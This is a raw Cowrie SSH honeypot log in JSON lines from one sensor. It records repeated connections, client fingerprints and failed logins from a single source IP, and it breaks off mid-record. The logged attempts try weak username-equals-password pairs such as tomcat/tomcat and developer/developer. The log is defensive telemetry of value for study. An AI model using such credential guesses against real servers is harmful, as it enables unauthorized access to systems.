{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:28.123764Z","src_ip":"212.227.235.229","session":"81378068aa04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60270,"dst_ip":"1.2.3.4","dst_port":22,"session":"a79c61d44a53","protocol":"ssh","message":"New connection: 212.227.235.229:60270 (1.2.3.4:22) [session: a79c61d44a53]","sensor":"my-vps","timestamp":"2025-08-28T08:08:31.190920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:31.211586Z","src_ip":"212.227.235.229","session":"a79c61d44a53"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:31.476840Z","src_ip":"212.227.235.229","session":"a79c61d44a53"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:33.316075Z","src_ip":"212.227.235.229","session":"a79c61d44a53"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:35.175394Z","src_ip":"212.227.235.229","session":"a79c61d44a53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44418,"dst_ip":"1.2.3.4","dst_port":22,"session":"945edf693a0b","protocol":"ssh","message":"New connection: 212.227.235.229:44418 (1.2.3.4:22) [session: 945edf693a0b]","sensor":"my-vps","timestamp":"2025-08-28T08:08:44.357920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:44.498641Z","src_ip":"212.227.235.229","session":"945edf693a0b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:44.646633Z","src_ip":"212.227.235.229","session":"945edf693a0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53572,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ca4ad20d802","protocol":"ssh","message":"New connection: 212.227.235.229:53572 (1.2.3.4:22) [session: 8ca4ad20d802]","sensor":"my-vps","timestamp":"2025-08-28T08:08:48.849714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:48.851056Z","src_ip":"212.227.235.229","session":"8ca4ad20d802"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:48.997241Z","src_ip":"212.227.235.229","session":"945edf693a0b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:50.193782Z","src_ip":"212.227.235.229","session":"8ca4ad20d802"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:51.370178Z","src_ip":"212.227.235.229","session":"945edf693a0b"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:52.536529Z","src_ip":"212.227.235.229","session":"8ca4ad20d802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53582,"dst_ip":"1.2.3.4","dst_port":22,"session":"6975a01c79ea","protocol":"ssh","message":"New connection: 212.227.235.229:53582 (1.2.3.4:22) [session: 6975a01c79ea]","sensor":"my-vps","timestamp":"2025-08-28T08:08:52.667438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:52.676377Z","src_ip":"212.227.235.229","session":"6975a01c79ea"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:08:53.843341Z","src_ip":"212.227.235.229","session":"8ca4ad20d802"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cdc6a85cee6","protocol":"ssh","message":"New connection: 212.227.235.229:53586 (1.2.3.4:22) [session: 4cdc6a85cee6]","sensor":"my-vps","timestamp":"2025-08-28T08:08:56.836589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:56.841031Z","src_ip":"212.227.235.229","session":"4cdc6a85cee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40540,"dst_ip":"1.2.3.4","dst_port":22,"session":"a49ad3f1b22b","protocol":"ssh","message":"New connection: 212.227.235.229:40540 (1.2.3.4:22) [session: a49ad3f1b22b]","sensor":"my-vps","timestamp":"2025-08-28T08:08:56.849192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:56.904314Z","src_ip":"212.227.235.229","session":"a49ad3f1b22b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:57.094453Z","src_ip":"212.227.235.229","session":"a49ad3f1b22b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40544,"dst_ip":"1.2.3.4","dst_port":22,"session":"769097e18de1","protocol":"ssh","message":"New connection: 212.227.235.229:40544 (1.2.3.4:22) [session: 769097e18de1]","sensor":"my-vps","timestamp":"2025-08-28T08:08:57.461852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:08:57.463163Z","src_ip":"212.227.235.229","session":"769097e18de1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:57.902706Z","src_ip":"212.227.235.229","session":"769097e18de1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:58.665278Z","src_ip":"212.227.235.229","session":"4cdc6a85cee6"}
{"eventid":"cowrie.login.failed","username":"sergey","password":"sergey","message":"login attempt [sergey/sergey] failed","sensor":"my-vps","timestamp":"2025-08-28T08:08:58.827652Z","src_ip":"212.227.235.229","session":"a49ad3f1b22b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-2